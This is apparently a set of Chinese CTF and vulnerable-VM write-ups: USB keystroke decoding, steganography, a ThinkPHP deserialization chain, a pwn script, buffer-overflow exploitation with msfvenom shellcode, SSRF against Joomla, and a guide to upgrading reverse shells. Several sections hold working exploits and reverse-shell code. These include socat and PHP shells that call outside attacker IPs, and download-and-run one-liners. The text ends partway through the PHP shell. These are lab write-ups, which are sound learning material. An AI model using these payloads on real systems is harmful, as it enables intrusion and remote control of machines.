              "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
              "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
             "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
             "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
             "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
             "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
             "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
             "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
             "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
keys = open('out.txt') #这里是加号冒号的数据
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output))

得到压缩包,需要密码。

然后同理提取usb.src == "2.10.1"

脚本同上,获得密码:35c535765e50074a

解压得到flag

image.png

everylasting_night

用stegsolve打开,并在a2通道发现隐写痕迹(因为图中观察为竖着,所以选column)

根据题目提示lsb,用cloacked-pixel工具,

python2 lsb.py extract everlasting_night.png 1.txt

f78dcd383f1b574b

得到504b0304开头,利用hex编辑器

是一个加密的压缩包

Hex编辑器打开图片,文件尾发现字符串

FB 3E FC E4 CE AC 2F 54 45 C7 AE 17 E3 E9
69 AB

md5解密得到

即为压缩包密码,解压

将得到的文件,用hex编辑器打开,得到

删除文件头,并将文件另存为1.data,再放到gimp里看看

调整宽度,得到flag

babydisk

vmdk文件,用取证大师取出来一个音频wav和一个加密文件

LA25ARQGRJMYGN4JBZV.png

wav是deepsound隐写,但是有加密,用john爆破

#!/usr/bin/env python3
'''
deepsound2john extracts password hashes from audio files containing encrypted
data steganographically embedded by DeepSound (http://jpinsoft.net/deepsound/).
This method is known to work with files created by DeepSound 2.0.
Input files should be in .wav format. Hashes can be recovered from audio files
even after conversion from other formats, e.g.,
    ffmpeg -i input output.wav
Usage:
    python3 deepsound2john.py carrier.wav > hashes.txt
    john hashes.txt
This software is copyright (c) 2018 Ryan Govostes <rgovostes@gmail.com>, and
it is hereby released to the general public under the following terms:
Redistribution and use in source and binary forms, with or without
modification, are permitted.
'''

import logging
import os
import sys
import textwrap

def decode_data_low(buf):
  return buf[::2]

def decode_data_normal(buf):
  out = bytearray()
  for i in range(0, len(buf), 4):
    out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))
  return out

def decode_data_high(buf):
  out = bytearray()
  for i in range(0, len(buf), 8):
    out.append((buf[i] & 3) << 6     | (buf[i + 2] & 3) << 4 \
             | (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))
  return out

def is_magic(buf):
  # This is a more efficient way of testing for the `DSCF` magic header without
  # decoding the whole buffer
  return (buf[0] & 15)  == (68 >> 4) and (buf[2]  & 15) == (68 & 15) \
     and (buf[4] & 15)  == (83 >> 4) and (buf[6]  & 15) == (83 & 15) \
     and (buf[8] & 15)  == (67 >> 4) and (buf[10] & 15) == (67 & 15) \
     and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)

def is_wave(buf):
  return buf[0:4] == b'RIFF' and buf[8:12] == b'WAVE'

def process_deepsound_file(f):
  bname = os.path.basename(f.name)
  logger = logging.getLogger(bname)

  # Check if it's a .wav file
  buf = f.read(12)
  if not is_wave(buf):
    global convert_warn
    logger.error('file not in .wav format')
    convert_warn = True
    return
  f.seek(0, os.SEEK_SET)

  # Scan for the marker...
  hdrsz = 104
  hdr = None

  while True:
    off = f.tell()
    buf = f.read(hdrsz)
    if len(buf) < hdrsz: break

    if is_magic(buf):
          hdr = decode_data_normal(buf)
          logger.info('found DeepSound header at offset %i', off)
          break

    f.seek(-hdrsz + 1, os.SEEK_CUR)

  if hdr is None:
    logger.warn('does not appear to be a DeepSound file')
    return

  # Check some header fields
  mode = hdr[4]
  encrypted = hdr[5]

  modes = {2: 'low', 4: 'normal', 8: 'high'}
  if mode in modes:
    logger.info('data is encoded in %s-quality mode', modes[mode])
  else:
    logger.error('unexpected data encoding mode %i', modes[mode])
    return

  if encrypted == 0:
    logger.warn('file is not encrypted')
    return
  elif encrypted != 1:
    logger.error('unexpected encryption flag %i', encrypted)
    return

  sha1 = hdr[6:6+20]
  print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))

if __name__ == '__main__':
  import argparse

  parser = argparse.ArgumentParser()
  parser.add_argument('--verbose', '-v', action='store_true')
  parser.add_argument('files', nargs='+', metavar='file',
    type=argparse.FileType('rb', bufsize=4096))
  args = parser.parse_args()

  if args.verbose:
    logging.basicConfig(level=logging.INFO)
  else:
    logging.basicConfig(level=logging.WARN)

  convert_warn = False

  for f in args.files:
    process_deepsound_file(f)

  if convert_warn:
    print(textwrap.dedent('''
    ---------------------------------------------------------------
    Some files were not in .wav format. Try converting them to .wav
    and try again. You can use: ffmpeg -i input output.wav
    ---------------------------------------------------------------
    '''.rstrip()), file=sys.stderr)
python3 deepsound2john.py 1.wav > flag.txt

RJYITBQXQNBH19.png

deepsound提取出1Z13YWXKHRRWU8WHDFB3.png

加密文件可以Veracrypt挂载,密码就是key.txt文件,有一个spiral.zip,但是中间16进制倒了,需要旋转。

旋转脚本

def generateMatrix(n):
    nums = [[0] * n for _ in range(n)]
    startx, starty = 0, 0               # 起始点
    loop, mid = n // 2, n // 2          # 迭代次数、n为奇数时,矩阵的中心点
    count = 1                           # 计数

    for offset in range(1, loop + 1) :      # 每循环一层偏移量加1,偏移量从1开始
        for i in range(starty, n - offset) :    # 从左至右,左闭右开
            nums[startx][i] = count
            count += 1
        for i in range(startx, n - offset) :    # 从上至下
            nums[i][n - offset] = count
            count += 1
        for i in range(n - offset, starty, -1) : # 从右至左
            nums[n - offset][i] = count
            count += 1
        for i in range(n - offset, startx, -1) : # 从下至上
            nums[i][starty] = count
            count += 1              
        startx += 1         # 更新起始点
        starty += 1

    if n % 2 != 0 : # n为奇数时,填充中心点
        nums[mid][mid] = count 
    return nums

array1 = [0]*7569
fr = open('spiral','rb').read()
s = sum(generateMatrix(87), [])

for i in range(len(s)):
    array1[i] = fr[s[i]-1]

fw = open('flag.zip','wb')
for i in array1:
    fw.write(bytes([i]))

fw.close()

image.png

image.png

长度49 七位一行读即可

ohhhhhhflag{701fa9fe-63f5-410b-93d4-119f96965be6}

CRYPTO

签到电台

image.png

image.png

按照密码提示,取前7*4位进行模十运算,然后S启动发包就有flag。

ISO9798

第一步常规的加延爆破,

a="ndEKcvMvOxibu075"
encode1="2f569d4264c5446cd0e4538fd6d3d949ec1c9949b155713dea3d455b4af469af"
str=string.ascii_letters+string.digits
for i1 in str:
    for i2 in str:
        for i3 in str:
            for i4 in str:
                plain=i1+i2+i3+i4+a
                encode=hashlib.sha256(plain.encode()).hexdigest()
                if encode==encode1:
                    print(plain)

取前四位输进去,之后让发送一个16进制的128比特位的随机数,不要带着0x

E0R9OYTNTUO0S7CPAN0.png

给了96位的16进制数

看到(rA||rB||B),96位数平均分成了三部分,之后把第二部分和第一部分组合在一起输入就出

基于挑战码的双向认证一、二、三

非预期:

前两个直接ssh连接,find / -name flag*,一个在flag1.txt,一个在flag2.txt

第三个修复了,但是有弱口令,root toor ,还是在flag2.txt

WEB

EZpop

西湖论剑原题

www.zip有源码泄露

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        return '<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} a{color:#2E5CD5;cursor: pointer;text-decoration: none} a:hover{text-decoration:underline; } body{ background: #fff; font-family: "Century Gothic","Microsoft yahei"; color: #333;font-size:18px;} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.6em; font-size: 42px }</style><div style="padding: 24px 48px;"> <h1>:) </h1><p> ThinkPHP V' . \think\facade\App::version() . '<br/><span style="font-size:30px;">14载初心不改 - 你值得信赖的PHP框架</span></p><span style="font-size:25px;">[ V6.0 版本由 <a href="https://www.yisu.com/" target="yisu">亿速云</a> 独家赞助发布 ]</span></div><script type="text/javascript" src="https://tajs.qq.com/stats?sId=64890268" charset="UTF-8"></script><script type="text/javascript" src="https://e.topthink.com/Public/static/client.js"></script><think id="ee9b1aa918103c4fc"></think>';
    }

    public function hello($name = 'ThinkPHP6')
    {
        return 'hello,' . $name;
    }
    public function test()
    {
    unserialize($_POST['a']);
    }

}

有反序列化,有链子直接打:

<?php

namespace think {

    use think\route\Url;

    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;
        public function __construct()
        {
            $this->lazySave = true;
            $this->withEvent = false;
            $this->exists = true;
            $this->table = new Url();
            $this->force = true;
            $this->data = ["1"];
        }
    }
}

namespace think\model {

    use think\Model;

    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }
    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {

    use think\Middleware;
    use think\Validate;

    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;
        public function __construct()
        {
            $this->url = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app = new Middleware();
            $this->route = new Validate();
        }
    }
}

namespace think {

    use think\view\driver\Php;

    class Validate
    {
        public function __construct()
        {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }
    class Middleware
    {
        public function __construct()
        {
            $this->request = "80";
        }
    }
}

namespace think\view\driver {
    class Php
    {
        public function __construct()
        {
        }
    }
}

image.png

REVERSE

baby_tree

题目给出了一个 swift ast文件。

p.s:原来从来没见过这种类型的逆向。

非常有趣,一开始蒙蔽了

思路类似于python 给出opcode字节码。鄙人不才采用手撕的办法得到源码

image-20220529134135336

这里定义了check函数。定义了两个变量 encode keyvalue

函数内定义了两个字符数组,b k 分别为 encode,keyvalue的值

image-20220529134521297

image-20220529134531104

数据来源在下方代码中有定义,这样就能推出如下部分源码

def check(encoded,keyValue):
    b= bytearray(encoded.encode('utf8'))
    k= bytearray(encoded.encode('utf8'))

image-20220529141356512

image-20220529141501662

结合着两处可以推出

 b[i + 1] = r3 ^ ((k[1] + (r0 >> 2)) & 0xff)

同理,我们恢复到

 for i in range(len(b)-4+1):
        r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
        b[i+0]=r2^((k[0]+(r0>>4))&0xff)
        b[i + 1] = r3 ^ ((k[1] + (r0 >> 2)) & 0xff)
        b[i + 2] = r0 ^ k[2]
        b[i + 3] = r1 ^ k[3]

根据下述两张图片,反写出

 k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]

image-20220529141724265

image-20220529141733405

encode数据

image-20220529134826403

keyvalue

image-20220529134855986

最终得到大致加密源码如下

def check(encoded, keyValue):
    b = bytearray(encoded.encode('utf8'))
    k = bytearray(keyValue.encode('utf8'))
    for i in range(len(b)-4+1):
        r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
        b[i+0]=r2^((k[0]+(r0>>4))&0xff)
        b[i + 1] = r3 ^ ((k[1] + (r0 >> 2)) & 0xff)
        b[i + 2] = r0 ^ k[2]
        b[i + 3] = r1 ^ k[3]
        k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]
    return b ==bytes[flag加密后数据]
check(flag,'345y')

根据加密源码写脚本解密即可得到flag

PWN

login-nomal

from pwn import *
from LibcSearcher import *
context(os='linux',arch='amd64')
context.log_level='debug'
# shellcode = "mov rax, 0x732f2f2f6e69622f push rax mov rdi, rsp push 0x1010101 ^ 0x6873 xor dword ptr [rsp], 0x1010101 xor esi, esi  push rsi  push 8 pop rsi add rsi, rsp push rsi  mov rsi, rsp xor edx, edx push SYS_execve  pop rax syscall"
shellcode = '''Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'''

p = remote('101.201.123.35',21476)

p.recvuntil('>>> ')
payload1 = 'opt:1\nmsg:ro0ta\n\r\n'
p.sendline(payload1)
p.recvuntil('>>> ')
payload2 = 'opt:2\nmsg:{0}A\n\r\n'.format(shellcode)

p.sendline(payload2)

p.interactive()

EMPIRE:BREAKOUT

跟前面的靶机相比这篇太简单了,但它是个系列,从第一篇开始吧。

靶机描述

This box was created to be an Easy box, but it can be Medium if you get lost.

For hints discord Server ( https://discord.gg/7asvAhCEhe )

这个盒子是一个简单的盒子,但如果你迷路了,它就变成中等的了。

信息搜集

目标确认

攻击机Kali IP:192.168.93.131

靶机 IP:192.168.93.140

image.png

开放 80 & 139 & 445 & 10000 & 20000端口

image.png

目录扫描:

image.png

image.png

这个地方可以看到Apache版本是2.4,记一下,说不定会用到。

回到主页,发现有提示:

image.png

应该是Brainfuck,解密一下:

.2uqPEfj3D<P'a-3

image.png

10000端口和20000端口都是一个登录界面:

image.png

漏洞利用

10000端口和2000端口的面板其实并不一样,尝试登录20000端口的面板;

在nmap的扫描结果中可以看到安装了Samba 4.6.2版本,所以用 enum4linux 扫描一下 SMB 服务器中的用户:

image.png

  • Username:cyber
  • Password:.2uqPEfj3D<P'a-3

登陆以后,在左下角可以看到终端操作,利用这个我们可以尝试弹shell到kali上:

image.pngimage.png

在当前目录下,可以看到user.txt,找到了第一个flag

image.png

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

提权

在当前目录下可以看到有一个tar文件,利用命令查看相关属性:

file tar  #查看文件类型
getcap tar #查看和设置程序文件的 capabilities 属性

image.png

cap_dac_read_search=ep功能。可以读取文件。

/var/backups/目录下可以看到备份文件.old_pass.bak,cat的话权限不够,这个地方就用到了上面的tar命令,用法可以--help

image.png

image.png

找到密码,切换root用户 & 升级shell

image.png

HARRYPOTTER:FAWKES

  • 哈利波特靶机三部曲终于刷完了~~这个靶机花了我好长时间,基本都在研究栈溢出上了。。。

靶机描述

Fawkes is the 3rd VM of 3-box HarryPotter VM series in which you need to find the last 3 horcruxes hidden inside the machine and defeat Voldemort.

Fawkes 是 3 盒 HarryPotter VM 系列的第三款 VM,您需要在其中找到隐藏在机器内的最后 3 个魂器并击败 Voldemort。

信息搜集

目标确认

攻击机kali IP:192.168.93.131

靶机Debian IP:192.168.93.139

image.png

开放了 21 & 22 & 80 & 2222 & 9898

image.png

路径扫描也没有什么很有用的信息

image.png

21端口允许匿名登陆,ssh开放了两个端口,有一个是9898端口。

随后进入ftp看一下server_hogwarts

image.png

image.png

很有可能这个文件就是一个突破点

缓冲区溢出

原来WEB的尽头是pwn吗?悟了。

使用edb调试server_hogwarts

nc 192.168.93.139 9898

image.png

输入500个A,edb弹出错误框,地址0x41414141无法执行,A的16进制就是0x41

image.png

可看到eip寄存器还有esp寄存器被覆盖了,说明存在缓冲区溢出:

image.png

利用msf生成自带字母

┌──(root💀kali)-[/home/kali/桌面]
└─# msf-pattern_create -l 500             
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

将此结果再次输入,得到覆盖地址为64413764

image.pngimage.png

msf-pattern_offset -l 500 -q 64413764,查询偏移位置为112,即第113开始的字符将会写进eip寄存器

image.png

EXP编写

import socket

if __name__ == '__main__':
    junk = b'A' * 112
    eip = b'B' * 4 + b'C' * 10
    s = socket.socket()
    s.connect(('127.0.0.1', 9898))
    s.send(bytes(junk + eip))

eip的值等于4个B+10个C,如果运行上面的脚本,eip是4个B即16进制为0x424242,那就是对的。
image.pngimage.png

并且esp被覆盖了10个C,现在的思路是要让eip的值指向esp,然后esp的内容是shellcode,这样就能任意执行我们的代码了。

edb自带查找功能,点击Plugins->OpcodeSearcher->Opcode Search,选择ESP->EIP,搜索server,Permissions要选择带x,可执行权限的。

image.png

找到了两个,有jmp esp,这里就确定用0x08049d55地址

image.png

生成shellcode,

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.93.131 LPORT=4444 -b "\x00" -f py

image.png

最终的POC

#!/usr/bin/python3

import socket

buf =  b""
buf += b"\xba\xd7\xd0\x3c\xc7\xd9\xee\xd9\x74\x24\xf4\x5d\x31"
buf += b"\xc9\xb1\x12\x31\x55\x12\x03\x55\x12\x83\x12\xd4\xde"
buf += b"\x32\xad\x0e\xe9\x5e\x9e\xf3\x45\xcb\x22\x7d\x88\xbb"
buf += b"\x44\xb0\xcb\x2f\xd1\xfa\xf3\x82\x61\xb3\x72\xe4\x09"
buf += b"\x84\x2d\x4b\x4a\x6c\x2c\x74\x5d\x31\xb9\x95\xed\xaf"
buf += b"\xe9\x04\x5e\x83\x09\x2e\x81\x2e\x8d\x62\x29\xdf\xa1"
buf += b"\xf1\xc1\x77\x91\xda\x73\xe1\x64\xc7\x21\xa2\xff\xe9"
buf += b"\x75\x4f\xcd\x6a"

# 0x08049d55
# Since, intel uses little endian, we have to use it from backwards
addr = b'\x55\x9d\x04\x08'

shellcode = b'\x41' * 112 + addr + b'\x90' * 32 + buf;

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.93.139', 9898))
s.send((shellcode))
s.close()

一个命令行监听4444端口,一个在执行脚本./payload.py

image.png

image.png

发现.mycreds.txt,尝试ssh连接

image.png

提权

sudo /bin/su

image.png

可执行root权限,从这里我们可以直接cat到第一个魂器

image.pngimage.png

接下来,看一下人家给咱们的提示note.txt

2b1599256ca6:~# cat note.txt
Hello Admin!!

We have found that someone is trying to login to our ftp server by mistake.You are requested to analyze the traffic and figure out the user.

我们发现有人试图错误地登录我们的 ftp 服务器。请您分析流量并找出

刚学到的流量提取命令

tcpdump port ftp or ftp-data
tcpdump -i eth0 port 21 

image.png

  • USER:neville
  • PASS:bL!Bsg3k

ssh再连接这个neville用户,可以找到第二个魂器:

image.png

image.png

最终提权

image.png

正如我们看到的,靶机的sudo版本是1.8.27。版本比较低,有一个CVE-2021-3156:Sudo中基于堆的缓冲区溢出 (Baron Samedit),影响范围1.8.2--1.8.31p2所有旧版本的sudo程序,任何未经授权的用户都可以使用默认sudo配置在易受攻击的主机上获得root权限。

参考资料:

我们可以利用这个exploit_nss.py来提权,但是会报错,是没有确定sudo的路径,

neville@Fawkes:~$ which sudo
/usr/local/bin/sudo

然后修改这个路径,保存后靶机scp下载脚本,执行即可

image.png

image.png

image.png

image.png

完结撒花!!!

写在后面

《HARRYPOTTER:FAWKES》是我目前做过难度最高的一台靶机,有些思路也是我第一次遇到。我个人是学web和misc的,之前从来没接触过二进制安全,这次栈溢出的寸步难行更是提醒自己要往其他方向学习了,可能这也是趋势吧~

Linux 反向 shell 升级为完全可用的 TTY shell

前言

最近一周在打靶机,要弹shell,为了shell更加美观且易于操作,就浅浅写一下~

升级远程shell(仅限于Unix机器)

通常,在通过 nc 捕获 shell 之后,会在一个功能非常有限的 shell 中。例如没有命令历史记录(并使用“向上”和“向下”箭头循环浏览它们)和文件名称、命令自动完成等。在缺少这些功能的 shell 中查询或操作会比较麻烦。

注意 :要检查 shell 是否是 TTY shell,请使用 tty 命令。

rlwrap

可以通过使用 rlwrap 命令包装 nc 侦听器来减轻对 shell 的一些限制。默认情况下不会安装它,需要使用 sudo apt rlwrapapt-get install rlwrap 安装。

rlwrap nc -lvnp $port

使用python升级到完全交互式shell

  1. 连接到shell以后,先检查一下python的可用性,可以用which命令:

    which python python2 python3

只要安装了其中任何一个,就将返回已安装二进制文件的路径。

  1. 在shell中输入命令

    python3 -c 'import pty;pty.spawn("/bin/bash")';
  2. 接下来,在靶机上输入以下命令来设置一些重要的环境变量:

    export SHELL=bash
    export TERM=xterm-256color #允许 clear,并且有颜色
  3. ctrl+z将shell发送到后台

  4. 设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用stty命令来执行此操作:

    stty raw -echo;fg

回车一次后输入 reset 再回车将再次进入 shell 中,TTY shell升级完毕

其他语言写入交互式 shell:

echo os.system('/bin/bash')
/bin/sh -i

#python3
python3 -c 'import pty; pty.spawn("/bin/sh")'

#perl
perl -e 'exec "/bin/sh";'

#ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'

#lua
lua -e "os.execute('/bin/sh')"

使用 socat

另一种方法是将 socat 二进制文件上传到靶机并获得一个完全交互式的 shell。从 https://github.com/andrew-d/static-binaries 下载适当的二进制文件。Socat 需要在两台机器上才能工作。

#在本地监听::
socat file:`tty`,raw,echo=0 tcp-listen:4444

#靶机:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:1234

如果在命令注入的地方注入反弹 shell,获得即时完全交互式的反向 shell:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:1234

如果靶机访问不了互联网,就先把 socat 文件下载下来,开启 http 服务,然后将上面的路径指向你的本地地址。

也可以走scp下载这条路。

HARRYPOTTER : NAGINI

靶机描述

Nagini is the 2nd VM of 3-box HarryPotter VM series in which you need to find 3 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.

Nagini 是 3 盒 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息搜集

目标确认

攻击机Kali IP:192.168.93.131

靶机 IP:192.168.93.137

image.png

开放了22端口 & 80端口

image.png

源码没什么问题,去扫一下目录:

image.png

发现 /note.txt/joomla,目录 /joomla 应该是安装了 Joomla CMS,先看下 /note.txt

Hello developers!!

I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.

Regards,
site_amdin

开发人员您好!!

我将使用我们 https://quic.nagini.hogwarts 的新HTTP3服务器进行进一步的通信。
请所有开发人员定期访问服务器以检查最新公告。

问候
site_amdin

HTTP2 是以 HTTP 为基础并改动一些规则的产物。HTTP3 也是如此。换句话说,解释清楚现状后,我就可以很容易地讲明白未来是什么样子的。

HTTP3 的主要改进在传输层上。传输层不会再有我前面提到的那些繁重的 TCP 连接了。现在,一切都会走 UDP。

顺便说一下,QUIC 的意思是“快速 UDP Internet 连接”。协议的这种更改将显著加快连接建立和数据传输的速度。然而,虽说 UDP 肯定更快、更简单,但它不具备 TCP 的可靠性和错误处理能力。

TCP 必须进行多次往返,才能以方形且稳定的方式建立连接。UDP 不会顾虑那么多,而且它确实可以快速运行,代价是稳定性下降和丢包的风险。但是,UDP 能大大减少请求中的延迟。到同一服务器的重复连接的延迟几乎为零,因为不需要往返来建立连接。

image.png

HTTP3 是 HTTP2 的复用和压缩,协议从 TCP 更改为 UDP。然后,谷歌的那些人在协议中添加了他们做的层,以确保稳定性、数据包接收顺序及安全性。

需要搭建 quiche。在本地 kali 上搭建一下:

搭建的过程中用到 rust 的 cargo 命令,另外在cargo build --examples 命令使用前先装上cmake。

image.png

漏洞利用

cd quiche/target/debug/examples
 ./http3-client https://192.168.93.137
<html>
        <head>
        <title>Information Page</title>
        </head>
        <body>
                Greetings Developers!!

                I am having two announcements that I need to share with you:

                1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
                2. All developers are requested not to put any configuration's backup file (.bak) in main production servers as they are readable by every one.

                Regards,
                site_admin
        </body>
</html>

开发人员您好!!

我有两个公告需要与您分享:

  1. 我们不再需要主要生产服务器中的 /internalResourceFeTcher.php 中的功能。所以我将在本周之前删除相同的功能。
  2. 请所有开发者不要将任何配置的备份文件(.bak)放在主生产服务器中,因为每个人都可以读取它们。

问候
site_amdin

提到了两个目标.bak/internalResourceFeTcher.php

image.png

后面加上了?url,可能是SQL注入,也可能是SSRF,我更偏向于后面那个:

image.png

好的SSRF。

前面有说.bak文件,不是当前页面的备份文件,应该是在Joomla CMS,可以用joomscan扫描一下:

image.png

image.png

有后台登陆页面。

configuration.php.bak看见

image.png

有数据库用户名,但是没有密码,user = 'goblin'

可以用Gopherus进行SSRF攻击:

image.png

image.png

发现数据库名称joomla,接着看一下表名:

image.png

image.png

查看 joomla_users 表内的数据:

image.png

image.png

site_admin@nagini.hogwarts 是个邮箱,用户名应该是 site_admin ,不过密码被加密,也不好解,那就尝试更改密码,首先生成自己密码的 md5:

image.png

e10adc3949ba59abbe56e057f20f883e

image.png

image.png

更改完成,尝试登陆:

  • 用户名:site_admin
  • 密码:123456

image.png

登陆成功,然后想办法写入shell,有点像之前GKCTF那道禅知CMS的题目:

image.png

创建一个shell.php,用kali自带反弹shell的payload.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.93.131';  // CHANGE THIS
$port = 2333;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
